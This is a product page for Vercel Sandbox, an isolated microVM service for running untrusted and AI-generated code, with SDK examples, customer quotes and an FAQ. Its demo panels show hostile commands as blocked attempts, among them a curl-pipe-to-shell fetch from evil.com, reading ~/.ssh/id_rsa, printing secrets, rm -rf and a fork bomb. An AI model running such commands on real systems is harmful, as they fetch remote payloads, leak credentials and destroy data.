The safest way to run code you didn’t write.

Modern apps increasingly need to execute code they didn’t author.
From AI agents, customer scripts, or dynamic systems.

Get Started
See Examples

remote-sandbox.vercel.run

Sandbox is not running

Agent

Reducing the risk of untrusted code, at scale.

Avoid unintended access to your environment variables, databases, and other secure environments

Vercel Sandbox

# Production Environment: ✓ Protected


$ echo $API_SECRET
✗ Error: Undefined


$ psql $DATABASE_URL
✗ Error: Database connection blocked


$ aws s3 ls s3://prod-bucket
✗ Error: Cloud resources isolated


$ cat ~/.ssh/id_rsa
✗ Error: SSH keys not accessible
Protect against potentially unsafe system commands, unintended resource usage, and escalated privileges

Vercel Sandbox

# Attempted Commands: ✓ Blocked by Sandbox


$ curl http://evil.com/payload.sh | sh
✗ Error: External network access denied


$ rm -rf /system/*
✗ Error: Filesystem access restricted


$ sudo apt-get install mining-software
✗ Error: Privilege escalation not permitted


$ while true; do fork; done
✗ Error: Resource limits exceeded
Modern apps increasingly need to execute code they didn’t author. From AI agents, customer scripts, or dynamic systems.

Vercel Sandbox

// AI Agent generated code
const code = await agent.generateCode(userPrompt);
const sb = await Sandbox.create({ runtime: 'python3.13' });
const result = await sb.runCommand({ cmd:'python', args: ['-c', code]});


// User-provided script
const userScript = request.body.script;
const sbUser = await Sandbox.create({ timeout: ms('5m') });
await sbUser.runCommand({ cmd: 'node', args: ['-e', 'user-script.js'] });


// Third-party plugin
const sbPlugin = await Sandbox.create({ resources: { vcpus: 2 } });
await sbPlugin.runCommand({ cmd: 'node', args: ['-e', 'plugin.js'] });
Avoid unintended access to your environment variables, databases, and other secure environments
Protect against potentially unsafe system commands, unintended resource usage, and escalated privileges
Modern apps increasingly need to execute code they didn’t author. From AI agents, customer scripts, or dynamic systems.

Vercel Sandbox

# Production Environment: ✓ Protected


$ echo $API_SECRET
✗ Error: Undefined


$ psql $DATABASE_URL
✗ Error: Database connection blocked


$ aws s3 ls s3://prod-bucket
✗ Error: Cloud resources isolated


$ cat ~/.ssh/id_rsa
✗ Error: SSH keys not accessible

Cost-efficient, scalable execution with Fluid compute

Vercel Sandbox runs on Fluid compute, Vercel optimized execution model that scales CPU and memory dynamically across millions of executions.

With Active CPU pricing, you’re billed only when code is actively running, not during idle or wait time, resulting in up to 95% lower cost for workloads with bursty or I/O-bound patterns.

Vercel Sandbox expands what our frontend infrastructure can handle. We plan to rely on it more for running untrusted code in AI workflows and for integrating tools that cannot run in a Node.js serverless function.

Tudor Golubenco

CTO, Xata

xata Logoxata Logo

Cua lets teams run computer-use agents from their apps with 100+ compatible VLMs — agents operate real desktops backed by Vercel Sandbox. Next.js playground on Vercel; agents execute in Vercel Sandbox via Cua with logs, replays, and evals — fully suited for reinforcement learning (RL) workflows.

Francesco Bonacci

Founder, Cua AI

cua Logocua Logo

Get started

You can get started with Vercel Sandbox quickly and easily.

dev-server.ts
import { Sandbox } from '@vercel/sandbox';
import { setTimeout as wait } from 'timers/promises';
import { spawn } from 'child_process';


(async () => {
  const sandbox = await Sandbox.create({
    source: { url: 'https://github.com/vercel/sandbox-example-next.git', type: 'git' },
    timeout: 300000,
    ports: [3000],
  });


  await sandbox.runCommand({ cmd: 'npm', args: ['i', '--loglevel', 'info'], stdout: process.stdout, stderr: process.stderr });
  await sandbox.runCommand({ cmd: 'npm', args: ['run', 'dev'], stdout: process.stdout, stderr: process.stderr, detached: true });


  const url = sandbox.domain(3000);


  process.on('SIGINT', async () => { await sandbox.stop(); process.exit(0); });


  await wait(1000);
  spawn('open', [url]);
})().catch(console.error);

Frequently Asked Questions

What is Vercel Sandbox?

Vercel Sandbox is an on-demand, isolated Linux microVM that runs arbitrary code safely through an SDK or CLI.

Why use Sandbox instead of managing containers or VMs myself?

Sandbox gives you secure microVM isolation, built-in authentication and observability, and usage-based pricing without any infrastructure to maintain.

Can it run untrusted or AI-generated code safely?

Yes. Sandbox is purpose-built to execute untrusted or AI-generated code in fully isolated, short-lived environments.

How is isolation implemented?

Each sandbox runs inside a Firecracker microVM on the same infrastructure that powers Vercel’s build system.

What runtimes are supported?

Node.js 22 and Python 3.13 are available by default, with more runtimes coming soon.

Can I install system packages and use sudo?

Yes. Each sandbox runs on Amazon Linux 2023, so you can install packages with dnf and use sudo as needed.

How long can a sandbox run?

Sandboxes run for 5 minutes by default, up to 45 minutes on Hobby and 5 hours on Pro and Enterprise plans, with programmatic extensions available.

What resources can I allocate?

Each sandbox can use up to 8 vCPUs and 2 GB of RAM per vCPU.

Can I expose a dev server or app on a public URL?

Yes. You can open up to four ports and access them through a sandbox URL, such as sandbox.domain(port).

How do I monitor what’s running?

You can view active sandboxes in the Observability → Sandboxes view for your project, and stream real-time logs to your terminal.

Ready to deploy? Start building with a free account. Speak to an expert for your Pro or Enterprise needs.

Start Deploying
Talk to an Expert

Trial Vercel with higher execution, increased app bandwidth, Speed Insights, team features, and more.

Request a Trial